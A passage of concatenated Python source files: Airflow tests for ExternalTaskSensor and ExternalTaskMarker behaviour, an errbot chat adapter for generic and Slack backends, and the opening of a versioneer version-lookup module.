            execution_delta=timedelta(0),
            allowed_states=['success'],
            dag=self.dag,
        )
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    def test_external_task_sensor_fn(self):
        """execution_date_fn is honored: identity passes, +1 day times out."""
        self.test_time_sensor()
        # check that the execution_fn works
        op1 = ExternalTaskSensor(
            task_id='test_external_task_sensor_check_delta_1',
            external_dag_id=TEST_DAG_ID,
            external_task_id=TEST_TASK_ID,
            execution_date_fn=lambda dt: dt + timedelta(0),
            allowed_states=['success'],
            dag=self.dag,
        )
        op1.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        # double check that the execution is being called by failing the test
        op2 = ExternalTaskSensor(
            task_id='test_external_task_sensor_check_delta_2',
            external_dag_id=TEST_DAG_ID,
            external_task_id=TEST_TASK_ID,
            execution_date_fn=lambda dt: dt + timedelta(days=1),
            allowed_states=['success'],
            timeout=1,
            poke_interval=1,
            dag=self.dag,
        )
        with pytest.raises(exceptions.AirflowSensorTimeout):
            op2.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    def test_external_task_sensor_fn_multiple_args(self):
        """Check this task sensor passes multiple args with full context. If no failure, means clean run."""
        self.test_time_sensor()

        def my_func(dt, context):
            assert context['logical_date'] == dt
            return dt + timedelta(0)

        op1 = ExternalTaskSensor(
            task_id='test_external_task_sensor_multiple_arg_fn',
            external_dag_id=TEST_DAG_ID,
            external_task_id=TEST_TASK_ID,
            execution_date_fn=my_func,
            allowed_states=['success'],
            dag=self.dag,
        )
        op1.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    def test_external_task_sensor_fn_kwargs(self):
        """Check this task sensor passes multiple args with full context. If no failure, means clean run."""
        self.test_time_sensor()

        def my_func(dt, ds_nodash, tomorrow_ds_nodash):
            assert ds_nodash == dt.strftime("%Y%m%d")
            assert tomorrow_ds_nodash == (dt + timedelta(days=1)).strftime("%Y%m%d")
            return dt + timedelta(0)

        op1 = ExternalTaskSensor(
            task_id='test_external_task_sensor_fn_kwargs',
            external_dag_id=TEST_DAG_ID,
            external_task_id=TEST_TASK_ID,
            execution_date_fn=my_func,
            allowed_states=['success'],
            dag=self.dag,
        )
        op1.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    def test_external_task_sensor_error_delta_and_fn(self):
        self.test_time_sensor()
        # Test that providing execution_delta and a function raises an error
        with pytest.raises(ValueError):
            ExternalTaskSensor(
                task_id='test_external_task_sensor_check_delta',
                external_dag_id=TEST_DAG_ID,
                external_task_id=TEST_TASK_ID,
                execution_delta=timedelta(0),
                execution_date_fn=lambda dt: dt,
                allowed_states=['success'],
                dag=self.dag,
            )

    def test_external_task_sensor_error_task_id_and_task_ids(self):
        self.test_time_sensor()
        # Test that providing both external_task_id and external_task_ids
        # raises an error
        with pytest.raises(ValueError):
            ExternalTaskSensor(
                task_id='test_external_task_sensor_task_id_and_task_ids',
                external_dag_id=TEST_DAG_ID,
                external_task_id=TEST_TASK_ID,
                external_task_ids=[TEST_TASK_ID],
                allowed_states=['success'],
                dag=self.dag,
            )

    def test_catch_duplicate_task_ids(self):
        self.test_time_sensor()
        # Test By passing same task_id multiple times
        with pytest.raises(ValueError):
            ExternalTaskSensor(
                task_id='test_external_task_duplicate_task_ids',
                external_dag_id=TEST_DAG_ID,
                external_task_ids=[TEST_TASK_ID, TEST_TASK_ID],
                allowed_states=['success'],
                dag=self.dag,
            )

    def test_catch_invalid_allowed_states(self):
        """allowed_states entries must be valid states (task or dag-run)."""
        with pytest.raises(ValueError):
            ExternalTaskSensor(
                task_id='test_external_task_sensor_check_1',
                external_dag_id=TEST_DAG_ID,
                external_task_id=TEST_TASK_ID,
                allowed_states=['invalid_state'],
                dag=self.dag,
            )
        with pytest.raises(ValueError):
            ExternalTaskSensor(
                task_id='test_external_task_sensor_check_2',
                external_dag_id=TEST_DAG_ID,
                external_task_id=None,
                allowed_states=['invalid_state'],
                dag=self.dag,
            )

    def test_external_task_sensor_waits_for_task_check_existence(self):
        """check_existence=True fails fast when the external task is missing."""
        op = ExternalTaskSensor(
            task_id='test_external_task_sensor_check',
            external_dag_id="example_bash_operator",
            external_task_id="non-existing-task",
            check_existence=True,
            dag=self.dag,
        )
        with pytest.raises(AirflowException):
            op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    def test_external_task_sensor_waits_for_dag_check_existence(self):
        """check_existence=True fails fast when the external DAG is missing."""
        op = ExternalTaskSensor(
            task_id='test_external_task_sensor_check',
            external_dag_id="non-existing-dag",
            external_task_id=None,
            check_existence=True,
            dag=self.dag,
        )
        with pytest.raises(AirflowException):
            op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_templated(dag_maker, app):
    """Templated external_dag_id/external_task_id render and feed the operator link."""
    with dag_maker():
        ExternalTaskSensor(
            task_id='templated_task',
            external_dag_id='dag_{{ ds }}',
            external_task_id='task_{{ ds }}',
        )
    dagrun = dag_maker.create_dagrun(run_type=DagRunType.SCHEDULED, execution_date=DEFAULT_DATE)
    (instance,) = dagrun.task_instances
    instance.render_templates()
    rendered_dag_id = f"dag_{DEFAULT_DATE.date()}"
    rendered_task_id = f"task_{DEFAULT_DATE.date()}"
    assert instance.task.external_dag_id == rendered_dag_id
    assert instance.task.external_task_id == rendered_task_id
    # Verify that the operator link uses the rendered value of ``external_dag_id``.
    app.config['SERVER_NAME'] = ""
    with app.app_context():
        url = instance.task.get_extra_links(DEFAULT_DATE, "External DAG")
    assert f"tree?dag_id={rendered_dag_id}" in url
class TestExternalTaskMarker(unittest.TestCase):
    """Tests for (de)serialization of ExternalTaskMarker."""

    def test_serialized_fields(self):
        """recursion_depth must be part of the serialized fields."""
        serialized_fields = ExternalTaskMarker.get_serialized_fields()
        assert "recursion_depth" in serialized_fields

    def test_serialized_external_task_marker(self):
        """Round-tripping through serialization preserves the marker's attributes."""
        dag = DAG('test_serialized_external_task_marker', start_date=DEFAULT_DATE)
        task = ExternalTaskMarker(
            task_id="parent_task",
            external_dag_id="external_task_marker_child",
            external_task_id="child_task1",
            dag=dag,
        )
        round_tripped = SerializedBaseOperator.deserialize_operator(
            SerializedBaseOperator.serialize_operator(task)
        )
        assert round_tripped.task_type == 'ExternalTaskMarker'
        assert round_tripped.external_dag_id == 'external_task_marker_child'
        assert round_tripped.external_task_id == 'child_task1'
@pytest.fixture
def dag_bag_ext():
    """
    Create a DagBag with DAGs looking like this. The dotted lines represent external dependencies
    set up using ExternalTaskMarker and ExternalTaskSensor.

    dag_0:   task_a_0 >> task_b_0
                             |
                             |
    dag_1:                   ---> task_a_1 >> task_b_1
                                                  |
                                                  |
    dag_2:                                        ---> task_a_2 >> task_b_2
                                                                       |
                                                                       |
    dag_3:                                                             ---> task_a_3 >> task_b_3
    """
    clear_db_runs()
    dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
    dag_0 = DAG("dag_0", start_date=DEFAULT_DATE, schedule_interval=None)
    task_a_0 = DummyOperator(task_id="task_a_0", dag=dag_0)
    # recursion_depth decreases down the chain (3 -> 2 -> 1), matching the
    # number of external levels left below each marker.
    task_b_0 = ExternalTaskMarker(
        task_id="task_b_0", external_dag_id="dag_1", external_task_id="task_a_1", recursion_depth=3, dag=dag_0
    )
    task_a_0 >> task_b_0

    dag_1 = DAG("dag_1", start_date=DEFAULT_DATE, schedule_interval=None)
    task_a_1 = ExternalTaskSensor(
        task_id="task_a_1", external_dag_id=dag_0.dag_id, external_task_id=task_b_0.task_id, dag=dag_1
    )
    task_b_1 = ExternalTaskMarker(
        task_id="task_b_1", external_dag_id="dag_2", external_task_id="task_a_2", recursion_depth=2, dag=dag_1
    )
    task_a_1 >> task_b_1

    dag_2 = DAG("dag_2", start_date=DEFAULT_DATE, schedule_interval=None)
    task_a_2 = ExternalTaskSensor(
        task_id="task_a_2", external_dag_id=dag_1.dag_id, external_task_id=task_b_1.task_id, dag=dag_2
    )
    task_b_2 = ExternalTaskMarker(
        task_id="task_b_2", external_dag_id="dag_3", external_task_id="task_a_3", recursion_depth=1, dag=dag_2
    )
    task_a_2 >> task_b_2

    dag_3 = DAG("dag_3", start_date=DEFAULT_DATE, schedule_interval=None)
    task_a_3 = ExternalTaskSensor(
        task_id="task_a_3", external_dag_id=dag_2.dag_id, external_task_id=task_b_2.task_id, dag=dag_3
    )
    task_b_3 = DummyOperator(task_id="task_b_3", dag=dag_3)
    task_a_3 >> task_b_3

    for dag in [dag_0, dag_1, dag_2, dag_3]:
        dag_bag.bag_dag(dag=dag, root_dag=dag)
    # Fixture-style teardown: wipe DagRuns created by the test afterwards.
    yield dag_bag
    clear_db_runs()
@pytest.fixture
def dag_bag_parent_child():
    """
    Create a DagBag with two DAGs looking like this. task_1 of child_dag_1 on day 1 depends on
    task_0 of parent_dag_0 on day 1. Therefore, when task_0 of parent_dag_0 on day 1 and day 2
    are cleared, parent_dag_0 DagRuns need to be set to running on both days, but child_dag_1
    only needs to be set to running on day 1.

                  day 1     day 2

    parent_dag_0  task_0    task_0
                    |
                    |
                    v
    child_dag_1   task_1    task_1
    """
    clear_db_runs()
    dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
    day_1 = DEFAULT_DATE
    with DAG("parent_dag_0", start_date=day_1, schedule_interval=None) as dag_0:
        task_0 = ExternalTaskMarker(
            task_id="task_0",
            external_dag_id="child_dag_1",
            external_task_id="task_1",
            # The marker always points at the day-1 run of the child.
            execution_date=day_1.isoformat(),
            recursion_depth=3,
        )
    with DAG("child_dag_1", start_date=day_1, schedule_interval=None) as dag_1:
        ExternalTaskSensor(
            task_id="task_1",
            external_dag_id=dag_0.dag_id,
            external_task_id=task_0.task_id,
            # Only the day-1 run waits on the parent; other dates wait on
            # nothing (empty list of execution dates).
            execution_date_fn=lambda logical_date: day_1 if logical_date == day_1 else [],
            mode='reschedule',
        )
    for dag in [dag_0, dag_1]:
        dag_bag.bag_dag(dag=dag, root_dag=dag)
    yield dag_bag
    clear_db_runs()
@provide_session
def run_tasks(dag_bag, execution_date=DEFAULT_DATE, session=None):
    """
    Run all tasks in the DAGs in the given dag_bag. Return the TaskInstance objects as a dict
    keyed by task_id.

    Every task is asserted to finish in SUCCESS so that calling tests never
    continue with a half-run fixture.
    """
    tis = {}
    for dag in dag_bag.dags.values():
        dagrun = dag.create_dagrun(
            state=State.RUNNING,
            execution_date=execution_date,
            start_date=execution_date,
            run_type=DagRunType.MANUAL,
            session=session,
        )
        # we use sorting by task_id here because for the test DAG structure of ours
        # this is equivalent to topological sort. It would not work in general case
        # but it works for our case because we specifically constructed test DAGS
        # in the way that those two sort methods are equivalent
        tasks = sorted((ti for ti in dagrun.task_instances), key=lambda ti: ti.task_id)
        for ti in tasks:
            ti.refresh_from_task(dag.get_task(ti.task_id))
            tis[ti.task_id] = ti
            ti.run(session=session)
            session.flush()
            session.merge(ti)
            assert_ti_state_equal(ti, State.SUCCESS)
    return tis
def assert_ti_state_equal(task_instance, state):
    """Reload ``task_instance`` from the database and verify its state."""
    task_instance.refresh_from_db()
    actual_state = task_instance.state
    assert actual_state == state
@provide_session
def clear_tasks(
    dag_bag,
    dag,
    task,
    session,
    start_date=DEFAULT_DATE,
    end_date=DEFAULT_DATE,
    dry_run=False,
):
    """Clear ``task`` and everything downstream of it (recursively) in ``dag``."""
    subset_dag: DAG = dag.partial_subset(task_ids_or_regex=[task.task_id], include_downstream=True)
    return subset_dag.clear(
        dag_bag=dag_bag,
        dry_run=dry_run,
        start_date=start_date,
        end_date=end_date,
        session=session,
    )
def test_external_task_marker_transitive(dag_bag_ext):
    """
    Test clearing tasks across DAGs.
    """
    task_instances = run_tasks(dag_bag_ext)
    dag_0 = dag_bag_ext.get_dag("dag_0")
    clear_tasks(dag_bag_ext, dag_0, dag_0.get_task("task_a_0"))
    # Clearing the head of the chain must propagate through every
    # ExternalTaskMarker level down to the tail of dag_3.
    for task_id in ("task_a_0", "task_b_3"):
        assert_ti_state_equal(task_instances[task_id], State.NONE)
@provide_session
def test_external_task_marker_clear_activate(dag_bag_parent_child, session):
    """
    Test clearing tasks across DAGs and make sure the right DagRuns are activated.
    """
    dag_bag = dag_bag_parent_child
    day_1 = DEFAULT_DATE
    day_2 = DEFAULT_DATE + timedelta(days=1)
    for execution_date in (day_1, day_2):
        run_tasks(dag_bag, execution_date=execution_date)
    # Assert that dagruns of all the affected dags are set to SUCCESS before tasks are cleared.
    for dag in dag_bag.dags.values():
        for execution_date in (day_1, day_2):
            dag.get_dagrun(execution_date=execution_date, session=session).set_state(State.SUCCESS)
    session.flush()
    parent_dag = dag_bag.get_dag("parent_dag_0")
    clear_tasks(dag_bag, parent_dag, parent_dag.get_task("task_0"), start_date=day_1, end_date=day_2, session=session)

    def run_state(dag_id, execution_date):
        """State of one DagRun, re-read through the given session."""
        return dag_bag.get_dag(dag_id).get_dagrun(execution_date=execution_date, session=session).state

    # Affected dagruns flip to QUEUED after clearing; the child's day-2 run
    # is not a dependency of the cleared marker and stays SUCCESS.
    assert run_state('parent_dag_0', day_1) == State.QUEUED
    assert run_state('parent_dag_0', day_2) == State.QUEUED
    assert run_state('child_dag_1', day_1) == State.QUEUED
    assert run_state('child_dag_1', day_2) == State.SUCCESS
def test_external_task_marker_future(dag_bag_ext):
    """
    Test clearing tasks with no end_date. This is the case when users clear tasks with
    Future, Downstream and Recursive selected.
    """
    date_0 = DEFAULT_DATE
    date_1 = DEFAULT_DATE + timedelta(days=1)
    tis_by_date = {
        date_0: run_tasks(dag_bag_ext, execution_date=date_0),
        date_1: run_tasks(dag_bag_ext, execution_date=date_1),
    }
    dag_0 = dag_bag_ext.get_dag("dag_0")
    # end_date=None means "clear into the future": tasks on dag_0 through
    # dag_3 are affected on both dates.
    clear_tasks(dag_bag_ext, dag_0, dag_0.get_task("task_a_0"), end_date=None)
    assert_ti_state_equal(tis_by_date[date_0]["task_a_0"], State.NONE)
    assert_ti_state_equal(tis_by_date[date_0]["task_b_3"], State.NONE)
    assert_ti_state_equal(tis_by_date[date_1]["task_b_3"], State.NONE)
def test_external_task_marker_exception(dag_bag_ext):
    """
    Clearing across multiple DAGs should raise AirflowException if more levels are being cleared
    than allowed by the recursion_depth of the first ExternalTaskMarker being cleared.
    """
    run_tasks(dag_bag_ext)
    dag_0 = dag_bag_ext.get_dag("dag_0")
    # Shrink the first marker's recursion_depth below the chain length.
    dag_0.get_task("task_b_0").recursion_depth = 2
    with pytest.raises(AirflowException, match="Maximum recursion depth 2"):
        clear_tasks(dag_bag_ext, dag_0, dag_0.get_task("task_a_0"))
@pytest.fixture
def dag_bag_cyclic():
    """
    Create a DagBag with DAGs having cyclic dependencies set up by ExternalTaskMarker and
    ExternalTaskSensor.

    dag_0:   task_a_0 >> task_b_0
         ^                    |
         |                    |
    dag_1:                    ---> task_a_1 >> task_b_1
         |                                         ^
         |                                         |
    dag_n:                                         ---> task_a_n >> task_b_n
         |                                                              |
         -----------------------------------------------------

    Returns a factory: call it with the desired chain depth to build the bag.
    """

    def _factory(depth: int) -> DagBag:
        # Builds dag_0 .. dag_{depth}; the last dag's marker points back at
        # dag_0, closing the cycle.
        dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
        dags = []
        with DAG("dag_0", start_date=DEFAULT_DATE, schedule_interval=None) as dag:
            dags.append(dag)
            task_a_0 = DummyOperator(task_id="task_a_0")
            task_b_0 = ExternalTaskMarker(
                task_id="task_b_0", external_dag_id="dag_1", external_task_id="task_a_1", recursion_depth=3
            )
            task_a_0 >> task_b_0

        for n in range(1, depth):
            with DAG(f"dag_{n}", start_date=DEFAULT_DATE, schedule_interval=None) as dag:
                dags.append(dag)
                task_a = ExternalTaskSensor(
                    task_id=f"task_a_{n}",
                    external_dag_id=f"dag_{n-1}",
                    external_task_id=f"task_b_{n-1}",
                )
                task_b = ExternalTaskMarker(
                    task_id=f"task_b_{n}",
                    external_dag_id=f"dag_{n+1}",
                    external_task_id=f"task_a_{n+1}",
                    recursion_depth=3,
                )
                task_a >> task_b

        # Create the last dag which loops back
        with DAG(f"dag_{depth}", start_date=DEFAULT_DATE, schedule_interval=None) as dag:
            dags.append(dag)
            task_a = ExternalTaskSensor(
                task_id=f"task_a_{depth}",
                external_dag_id=f"dag_{depth-1}",
                external_task_id=f"task_b_{depth-1}",
            )
            task_b = ExternalTaskMarker(
                task_id=f"task_b_{depth}",
                external_dag_id="dag_0",
                external_task_id="task_a_0",
                recursion_depth=2,
            )
            task_a >> task_b

        for dag in dags:
            dag_bag.bag_dag(dag=dag, root_dag=dag)
        return dag_bag

    return _factory
def test_external_task_marker_cyclic_deep(dag_bag_cyclic):
    """
    Tests clearing across multiple DAGs that have cyclic dependencies. AirflowException should be
    raised.
    """
    dag_bag = dag_bag_cyclic(10)
    run_tasks(dag_bag)
    dag_0 = dag_bag.get_dag("dag_0")
    start_task = dag_0.get_task("task_a_0")
    # The cycle is longer than recursion_depth=3, so clearing must bail out.
    with pytest.raises(AirflowException, match="Maximum recursion depth 3"):
        clear_tasks(dag_bag, dag_0, start_task)
def test_external_task_marker_cyclic_shallow(dag_bag_cyclic):
    """
    Tests clearing across multiple DAGs that have cyclic dependencies shallower
    than recursion_depth
    """
    dag_bag = dag_bag_cyclic(2)
    run_tasks(dag_bag)
    dag_0 = dag_bag.get_dag("dag_0")
    tis = clear_tasks(dag_bag, dag_0, dag_0.get_task("task_a_0"), dry_run=True)
    cleared = sorted((ti.dag_id, ti.task_id) for ti in tis)
    # Every task of dag_0..dag_2 would be cleared exactly once.
    expected = [(f"dag_{n}", f"task_{letter}_{n}") for n in range(3) for letter in ("a", "b")]
    assert cleared == expected
@pytest.fixture
def dag_bag_multiple():
    """
    Create a DagBag containing two DAGs, linked by multiple ExternalTaskMarker.

    agg_dag's ``begin`` fans out to eight markers, each pointing at the same
    daily task but at a different (shifted) execution date.
    """
    dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
    daily_dag = DAG("daily_dag", start_date=DEFAULT_DATE, schedule_interval="@daily")
    agg_dag = DAG("agg_dag", start_date=DEFAULT_DATE, schedule_interval="@daily")
    dag_bag.bag_dag(dag=daily_dag, root_dag=daily_dag)
    dag_bag.bag_dag(dag=agg_dag, root_dag=agg_dag)
    # NOTE(review): task_id "daily_tas" looks like a typo for "daily_task",
    # but it is referenced consistently via daily_task.task_id below —
    # confirm before renaming.
    daily_task = DummyOperator(task_id="daily_tas", dag=daily_dag)
    begin = DummyOperator(task_id="begin", dag=agg_dag)
    for i in range(8):
        task = ExternalTaskMarker(
            task_id=f"{daily_task.task_id}_{i}",
            external_dag_id=daily_dag.dag_id,
            external_task_id=daily_task.task_id,
            # Each marker targets the run i days before the current ds.
            execution_date="{{ macros.ds_add(ds, -1 * %s) }}" % i,
            dag=agg_dag,
        )
        begin >> task
    yield dag_bag
def test_clear_multiple_external_task_marker(dag_bag_multiple):
    """Clearing a DAG with several ExternalTaskMarkers clears every target."""
    agg_dag = dag_bag_multiple.get_dag("agg_dag")
    tis = run_tasks(dag_bag_multiple, execution_date=DEFAULT_DATE)
    session = settings.Session()
    try:
        # Query the task instances reset to State.NONE across both DAGs.
        cleared = session.query(TaskInstance).filter(
            TaskInstance.state == State.NONE, TaskInstance.dag_id.in_(dag_bag_multiple.dag_ids)
        )
        assert agg_dag.clear(dag_bag=dag_bag_multiple) == len(tis) == cleared.count() == 10
    finally:
        session.close()
@pytest.fixture
def dag_bag_head_tail():
    """
    Create a DagBag containing one DAG, with task "head" depending on task "tail" of the
    previous execution_date, i.e. ... tail(day N) -> head(day N+1) -> body(day N+1) -> tail(day N+1) ...
    """
    dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
    with DAG("head_tail", start_date=DEFAULT_DATE, schedule_interval="@daily") as dag:
        # "head" waits (in reschedule mode) for "tail" of the previous day.
        head = ExternalTaskSensor(
            task_id='head',
            external_dag_id=dag.dag_id,
            external_task_id="tail",
            execution_delta=timedelta(days=1),
            mode="reschedule",
        )
        body = DummyOperator(task_id="body")
        # "tail" marks "head" of the *next* day for clearing.
        tail = ExternalTaskMarker(
            task_id="tail",
            external_dag_id=dag.dag_id,
            external_task_id=head.task_id,
            execution_date="{{ macros.ds_add(ds, 1) }}",
        )
        head >> body >> tail
        dag_bag.bag_dag(dag=dag, root_dag=dag)
    return dag_bag
@provide_session
def test_clear_overlapping_external_task_marker(dag_bag_head_tail, session):
    """Clearing "head" across overlapping markers clears each TI exactly once."""
    dag: DAG = dag_bag_head_tail.get_dag('head_tail')
    # "Run" 10 times.
    for delta in range(0, 10):
        execution_date = DEFAULT_DATE + timedelta(days=delta)
        dagrun = DagRun(
            dag_id=dag.dag_id,
            state=DagRunState.SUCCESS,
            execution_date=execution_date,
            run_type=DagRunType.MANUAL,
            run_id=f"test_{delta}",
        )
        session.add(dagrun)
        # Mark every task of the run as already successful so clear() has
        # something to reset.
        for task in dag.tasks:
            ti = TaskInstance(task=task)
            dagrun.task_instances.append(ti)
            ti.state = TaskInstanceState.SUCCESS
    session.flush()
    # The next two lines are doing the same thing. Clearing the first "head" with "Future"
    # selected is the same as not selecting "Future". They should take similar amount of
    # time too because dag.clear() uses visited_external_tis to keep track of visited ExternalTaskMarker.
    # 10 runs x 3 tasks = 30 task instances cleared either way.
    assert dag.clear(start_date=DEFAULT_DATE, dag_bag=dag_bag_head_tail, session=session) == 30
    assert (
        dag.clear(
            start_date=DEFAULT_DATE,
            end_date=execution_date,
            dag_bag=dag_bag_head_tail,
            session=session,
        )
        == 30
    )
|
|
# coding:utf-8
import abc
import logging
LOG = logging.getLogger(__name__)
class AbstractChatAdapterFactory(metaclass=abc.ABCMeta):
    """Abstract factory for building backend-specific chat adapters.

    BUG FIX: the generic-adapter hook was previously misspelled
    ``generic_adpater``; concrete factories implement ``generic_adapter``,
    so the typo'd abstract method was never overridden and instantiating a
    concrete factory raised TypeError.
    """

    @abc.abstractmethod
    def slack_adapter(self, bot_plugin):
        """Return a chat adapter for the Slack backend."""

    @abc.abstractmethod
    def generic_adapter(self, bot_plugin):
        """Return a chat adapter for any non-Slack backend."""
class ChatAdapterFactory(AbstractChatAdapterFactory):
    """Concrete factory mapping chat backends to their adapter classes."""

    @staticmethod
    def slack_adapter(bot_plugin):
        """Build the Slack-specific adapter."""
        adapter = SlackChatAdapter(bot_plugin)
        return adapter

    @staticmethod
    def generic_adapter(bot_plugin):
        """Build the backend-agnostic adapter."""
        adapter = GenericChatAdapter(bot_plugin)
        return adapter
class AbstractChatAdapter(metaclass=abc.ABCMeta):
    """Interface every chat backend adapter must implement."""

    @abc.abstractmethod
    def get_username(self, msg):
        # Return the sender's name extracted from an errbot message object.
        pass

    @abc.abstractmethod
    def post_message(self, whisper, message, user, channel, extra):
        # Deliver *message* to the backend, to a user and/or channel.
        pass

    @abc.abstractmethod
    def format_help(self, help_strings):
        # Render a list of help entries into backend-appropriate text.
        pass
class GenericChatAdapter(AbstractChatAdapter):
    """Chat adapter for errbot backends without backend-specific features."""

    def __init__(self, bot_plugin):
        self.botplugin = bot_plugin

    def get_username(self, msg):
        """
        Return the user name from an errbot message object.
        """
        return str(msg.frm)

    def format_help(self, help_strings):
        """Render help entries, grouped by pack, into plain text.

        :param help_strings: iterable of dicts with "pack", "display" and
            "description" keys; entries of the same pack are assumed to be
            contiguous so the pack header is emitted once per group.
        :return: the formatted help text.
        """
        help_text = ""
        pack = ""
        for help_obj in help_strings:
            # Emit a pack header the first time a new pack is seen.
            if pack != help_obj["pack"]:
                help_text += "[{}]\n".format(help_obj["pack"])
                pack = help_obj["pack"]
            help_text += "\t{}{} {} - {}\n".format(
                self.botplugin.st2config.bot_prefix,
                self.botplugin.st2config.plugin_prefix,
                help_obj["display"],
                help_obj["description"],
            )
        return help_text

    def post_message(self, whisper, message, user, channel, extra):
        """
        Post messages to the chat backend.

        Prefers the user as destination when *whisper* is set, otherwise the
        channel, falling back to the user when no channel resolves.
        """
        LOG.debug("Posting Message: whisper={}, message={}, user={}, channel={}, extra={}".format(
            whisper,
            message,
            user,
            channel,
            extra)
        )
        user_id = None
        channel_id = None
        if user is not None:
            try:
                user_id = self.botplugin.build_identifier(user)
            except ValueError as err:
                # BUG FIX: this warning previously interpolated ``channel``
                # instead of the offending ``user`` identifier.
                LOG.warning("Invalid user identifier '{}'. {}".format(user, err))
        if channel is not None:
            try:
                channel_id = self.botplugin.build_identifier(channel)
            except ValueError as err:
                LOG.warning("Invalid channel identifier '{}'. {}".format(channel, err))
        # Only whisper to users, not channels.
        if whisper and user_id is not None:
            target_id = user_id
        elif channel_id is not None:
            target_id = channel_id
        else:
            # Fall back to user if no channel is set.
            target_id = user_id
        if target_id is None:
            LOG.error("Unable to post message as there is no user or channel destination.")
        else:
            self.botplugin.send(target_id, message)
class SlackChatAdapter(AbstractChatAdapter):
    """Chat adapter using Slack-specific errbot features (cards, identities)."""

    def __init__(self, bot_plugin):
        self.botplugin = bot_plugin

    def get_username(self, msg):
        """
        Return the user name from an errbot message object.
        Slack identity tuple (username, userid, channelname, channelid)
        """
        username, user_id, channel_name, channel_id = \
            self.botplugin._bot.extract_identifiers_from_string(str(msg.frm))
        if username is None:
            name = "#{}".format(channel_name)
        else:
            name = "@{}".format(username)
        return name

    def post_message(self, whisper, message, user, channel, extra):
        """
        Post messages to the chat backend, rendered as a Slack "card" when
        *extra* carries backend-specific attachment data.
        """
        LOG.debug("Posting Message: whisper={}, message={}, user={}, channel={}, extra={}".format(
            whisper,
            message,
            user,
            channel,
            extra)
        )
        user_id = None
        channel_id = None
        if user is not None:
            try:
                user_id = self.botplugin.build_identifier(user)
            except ValueError as err:
                # BUG FIX: this warning previously interpolated ``channel``
                # instead of the offending ``user`` identifier.
                LOG.warning("Invalid user identifier '{}'. {}".format(user, err))
        if channel is not None:
            try:
                channel_id = self.botplugin.build_identifier(channel)
            except ValueError as err:
                LOG.warning("Invalid channel identifier '{}'. {}".format(channel, err))
        # Only whisper to users, not channels.
        if whisper and user_id is not None:
            target_id = user_id
        elif channel_id is not None:
            target_id = channel_id
        else:
            # Fall back to user if no channel is set.
            target_id = user_id
        if target_id is None:
            LOG.error("Unable to post message as there is no user or channel destination.")
            return
        # BUG FIX: ``extra is None or extra is {}`` compared identity against a
        # fresh dict literal and was always False for empty dicts; use
        # truthiness to detect a missing/empty payload.
        if not extra:
            self.botplugin.send(target_id, message)
            return
        LOG.debug("Send card using backend {}".format(self.botplugin.mode))
        backend = extra.get(self.botplugin.mode, {})
        LOG.debug("fields {}".format(
            tuple(
                (field.get("title"), field.get("value"))
                for field in backend.get("fields", [])
            )
        ))
        # BUG FIX: ``backend is not {}`` was always True (identity against a
        # fresh literal); test for actual content instead.
        if backend:
            kwargs = {
                "body": message,
                "to": target_id,
                "summary": backend.get("pretext"),
                "title": backend.get("title"),
                "link": backend.get("title_link"),
                "image": backend.get("image_url"),
                "thumbnail": backend.get("thumb_url"),
                "color": backend.get("color"),
                "fields": tuple(
                    (field.get("title"), field.get("value"))
                    for field in backend.get("fields", [])
                ),
            }
            LOG.debug("Type: {}, Args: {}".format(type(kwargs), kwargs))
            self.botplugin.send_card(**kwargs)
        else:
            # BUG FIX: was ``self.mode`` (AttributeError); the mode lives on
            # the plugin object.
            LOG.warning("{} not found.".format(self.botplugin.mode))
            self.botplugin.send(target_id, message)

    def format_help(self, help_strings):
        """Render help entries, grouped by pack, using Slack markdown."""
        help_text = ""
        pack = ""
        for help_obj in help_strings:
            # Emit a bold pack header the first time a new pack is seen.
            if pack != help_obj["pack"]:
                help_text += "\n**{}**\n".format(help_obj["pack"])
                pack = help_obj["pack"]
            help_text += "\t{}{} {} - _{}_\n".format(
                self.botplugin.st2config.bot_prefix,
                self.botplugin.st2config.plugin_prefix,
                help_obj["display"],
                help_obj["description"],
            )
        return help_text
|
|
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.16 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
    """Get the keywords needed to look up the version information.

    Returns a dict with "refnames" and "full" entries; both remain literal
    "$Format:...$" placeholders unless git-archive expanded them.
    """
    # these strings will be replaced by git during git-archive.
    # setup.py/versioneer.py will grep for the variable names, so they must
    # each be defined on a line of their own. _version.py will just call
    # get_keywords().
    git_refnames = "$Format:%d$"
    git_full = "$Format:%H$"
    keywords = {"refnames": git_refnames, "full": git_full}
    return keywords
class VersioneerConfig:
    """Container for Versioneer configuration parameters.

    Instances are populated attribute-by-attribute in get_config()
    (VCS, style, tag_prefix, parentdir_prefix, versionfile_source, verbose).
    """
def get_config():
    """Create, populate and return the VersioneerConfig() object."""
    # these strings are filled in when 'setup.py versioneer' creates
    # _version.py
    config = VersioneerConfig()
    config.VCS = "git"
    config.style = "pep440"
    config.tag_prefix = "v"
    config.parentdir_prefix = "obztak-"
    config.versionfile_source = "maglites/_version.py"
    config.verbose = False
    return config
class NotThisMethod(Exception):
    """Exception raised if a method is not valid for the current scenario.

    Raised by the individual discovery strategies so get_versions() can fall
    through to the next one.
    """
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method):  # decorator
    """Decorator to mark a method as the handler for a particular VCS."""
    def decorate(f):
        """Store f in HANDLERS[vcs][method]."""
        HANDLERS.setdefault(vcs, {})[method] = f
        return f
    return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False):
